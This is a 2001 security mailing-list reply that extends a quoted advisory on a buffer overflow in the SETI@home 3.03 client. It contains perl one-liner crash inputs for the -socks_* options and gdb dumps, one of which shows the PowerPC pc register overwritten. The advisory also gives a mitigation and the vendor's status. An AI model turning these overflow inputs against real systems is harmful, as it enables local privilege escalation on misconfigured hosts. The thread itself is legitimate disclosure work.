Also on joes post he did not show an eip overwrite but on OSX we are
able to overwrite the pc register.
Starting program: /Users/elguapo/./setiathome-3.03.powerpc-
apple.1/setiathome -socks_user `perl -e 'print "A" x 9000'`
[Switching to thread 1 (process 612 thread 0x1907)]
Program received signal EXC_BAD_ACCESS, Could not access memory.
0x41414140 in ?? ()
(gdb) i r
r0 0x278c 10124
r1 0xbfffd670 3221214832
r2 0x3021c 197148
r3 0x16250 90704
r4 0x201 513
r5 0x1a4 420
r6 0x400 1024
r7 0x2e 46
r8 0x170 368
r9 0x3 3
r10 0x53 83
r11 0x2cbc4 183236
r12 0x41414141 1094795585
r13 0x0 0
r14 0x0 0
r15 0x0 0
r16 0x0 0
r17 0x0 0
r18 0x0 0
r19 0x0 0
r20 0x0 0
r21 0x3 3
r22 0x0 0
r23 0x1 1
r24 0xffffffff 4294967295
r25 0x0 0
r26 0x0 0
r27 0x1 1
r28 0xbfffd7e0 3221215200
r29 0x0 0
r30 0x0 0
r31 0x2774 10100
pc 0x41414140 1094795584
ps 0x4000f030 1073803312
cr 0x22000284 570425988
lr 0x278c 10124
ctr 0x41414141 1094795585
xer 0x20 32
mq 0x0 0
fpscr 0x0 0
vrsave 0x0 0
-KF
On Sunday, December 2, 2001, at 03:15 PM, joetesta_at_hushmail.com wrote:
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> Vulnerability in SETI_at_home
>
>
>
> Overview
>
> SETI@home (http://setiathome.berkeley.edu/) is a distributed project
> that
> allows ordinary citizens participate in the search for extraterrestrial
> intelligence using their computer's idle time. A buffer overflow exists
> in the UNIX client software.
>
> NOTE: this vulnerability is NOT exploitable in the default
> installation.
>
>
>
> Details
>
> The "i386-pc-linux-gnu-gnulibc2.1" version of the setiathome client (and
> possibly others) is vulnerable to buffer overflow. Example:
>
>
> # ./setiathome -version
> SETI_at_home client.
> Platform: i386-pc-linux-gnu-gnulibc2.1
> Version: 3.03
>
> ...
> ...
>
> # ./setiathome -socks_server `perl -e 'print "A" x 5604;'`
> Segmentation fault
> # ./setiathome -socks_user `perl -e 'print "A" x 5344;'`
> Segmentation fault
> # ./setiathome -socks_passwd `perl -e 'print "A" x 5280;'`
> Segmentation fault
> #
>
> [root_at_seti /home/setiathome]# gdb setiathome
> GNU gdb 5.0rh-5 Red Hat Linux 7.1
> Copyright 2001 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and
> you are
> welcome to change it and/or distribute copies of it under certain
> conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB. Type "show warranty" for
> details.
> This GDB was configured as "i386-redhat-linux"...
> (no debugging symbols found)...
> (gdb) r -socks_server `perl -e 'print "A" x 5604;'`
> Starting program: /home/setiathome/setiathome -socks_server `perl -e
> 'print "A" x 5604;'`
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x2ab4d409 in strcpy () from /lib/libc.so.6
> (gdb) info registers
> eax 0x0 0
> ecx 0x40404040 1077952576
> edx 0x41414141 1094795585
> ebx 0xfefefeff -16843009
> esp 0x7fffe664 0x7fffe664
> ebp 0x7fffe6bc 0x7fffe6bc
> esi 0x7ffffe28 2147483176
> edi 0x807bffd 134725629
> eip 0x2ab4d409 0x2ab4d409
> eflags 0x10246 66118
> cs 0x23 35
> ss 0x2b 43
> ds 0x2b 43
> es 0x2b 43
> fs 0x0 0
> gs 0x0 0
> fctrl 0x37f 895
> fstat 0x0 0
> ftag 0xffff 65535
> fiseg 0x0 0
> fioff 0x0 0
> foseg 0x0 0
> fooff 0x0 0
> fop 0x0 0
>
>
>
> Solution
>
> The SETI_at_home UNIX client is not installed with a setuid bit by default.
> If one was added to it -- perhaps to run it under a 'setiathome'
> account --
> remove it immediately.
>
>
>
> Vendor Status
>
> The project directory, Dr. Dave P. Anderson, was contacted via
> <davea_at_ssl.berkeley.edu> on Monday, Nov 5th. He promptly replied that
> this problem will be fixed in the next release.
>
>
>
>
> - Joe Testa
>
> e-mail: joetesta_at_hushmail.com
> web page: http://hogs.rit.edu/~joet/
> AIM: LordSpankatron
>
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: Hush 2.1
> Note: This signature can be verified at https://www.hushtools.com
>
> wl0EARECAB0FAjwKtmIWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNGeO
> AJ9lCce/+Xb91i7BzpWvEiGfnUmBTgCginYcBQJ1WcuQeBC/RDyELpNvKIQ=
> =M4UW
> -----END PGP SIGNATURE-----
>
>
Received on Dec 03 2001
Intro
